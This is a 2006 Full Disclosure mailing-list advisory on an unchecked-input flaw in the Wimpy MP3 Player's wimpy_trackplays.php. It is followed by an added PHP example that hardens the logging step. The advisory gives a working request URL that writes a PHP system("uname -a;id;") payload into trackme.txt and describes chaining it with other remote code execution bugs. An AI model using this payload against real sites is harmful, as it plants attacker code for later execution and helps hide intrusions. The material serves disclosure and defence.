Full Disclosure mailing list archives

Wimpy MP3 Player - Text file overwrite vulnerability


From: Scott Dewey <wr0ck.lists () gmail com>
Date: Wed, 15 Feb 2006 20:55:15 -0500

=======================================================================================
XOR Crew :: Security Advisory                                         2/10/2006
=======================================================================================
Wimpy MP3 Player - Text file overwrite. (lame)
=======================================================================================
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN/
=======================================================================================

:: Summary

      Vendor       :  Plaino Inc.
      Vendor Site  :  http://www.wimpyplayer.com/
      Product(s)   :  Wimpy MP3 Player
      Version(s)   :  All
      Severity     :  Low
      Impact       :  trackme.txt overwrite
      Release Date :  2/10/2006
      Credits      :  ReZEN (rezen (a) xorcrew (.) net)

=======================================================================================

I. Description

Wimpy provides a simple, clean, enjoyable listening experience for your website's
visitors.  Lists and plays an entire directory full of mp3 files automatically.

=======================================================================================

II. Synopsis

The file wimpy_trackplays.php does not check the variables passed to it prior to
writing the contents of those variables to trackme.txt.  That allows us to write
anything we want to trackme.txt.  This is not really a problem for the server
running wimpy.  The problem lies in the fact that being able to write to
trackme.txt allows the attacker a jump off point for other Remote Command
Execution Bugs that read from text files.  These bugs are quite common and thus
wimpy aids the attacker in staying anonymous.

Example:

http://www.site.com/pathtowimpy/goodies/wimpy_trackplays.php?myAction=trackplays
&trackFile=<?php&trackArtist=system("uname -a;id;");&trackTitle=?>

that writes:

<?php
system("uname -a;id;");
?>

to trackme.txt.  Then all the attacker has to do is point his RCE exploit to
trackme.txt and there you have it.  So yeah lame vuln but interesting.  Peace out.

=======================================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, cijfer, my beautiful girlfriend.

=======================================================================================
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
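
A mitigation for the logging step described in the advisory, as an added example that is not part of the original post and is not Wimpy's own code: each play is written as one JSON line with `<` and `>` hex-escaped, so the log can never contain a PHP open tag. The parameter names come from the advisory; the function names, log location and JSON record format are assumptions.

```php
<?php
// Added example (hypothetical hardened logger, not Wimpy's code).
// Parameter names are from the advisory; log path and JSON format are assumptions.
const TRACK_LOG = __DIR__ . '/trackme.txt';   // assumed path; better kept outside the web root
const MAX_FIELD_LEN = 255;

/** Reduce one request parameter to a bounded, single-line string. */
function clean_field($value): string
{
    if (!is_string($value)) {                 // e.g. trackFile[]=x arrives as an array
        return '';
    }
    $value = preg_replace('/[\x00-\x1F\x7F]/', '', $value) ?? '';  // drop control chars, CR, LF
    return substr($value, 0, MAX_FIELD_LEN);
}

/** Build one log line; JSON_HEX_TAG emits < and > as \u003C and \u003E. */
function build_record(array $params): string
{
    $record = [
        'file'   => clean_field($params['trackFile'] ?? ''),
        'artist' => clean_field($params['trackArtist'] ?? ''),
        'title'  => clean_field($params['trackTitle'] ?? ''),
    ];
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_INVALID_UTF8_SUBSTITUTE;    // a truncated multibyte char must not break encoding
    return json_encode($record, $flags) . "\n";
}

/** Append the record under an exclusive lock; returns false on write failure. */
function log_play(array $params): bool
{
    return file_put_contents(TRACK_LOG, build_record($params), FILE_APPEND | LOCK_EX) !== false;
}

if (PHP_SAPI === 'cli') {
    // Constructed input mirroring the example request in the advisory.
    $sample = [
        'trackFile'   => '<?php',
        'trackArtist' => 'system("uname -a;id;");',
        'trackTitle'  => '?>',
    ];
    $line = build_record($sample);
    echo $line;
    var_dump(strpos($line, '<') === false);   // the stored line contains no '<' at all
}
```

Escaping on write only keeps this one file inert; a script elsewhere on the server that includes or evaluates arbitrary text files still needs its own fix.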
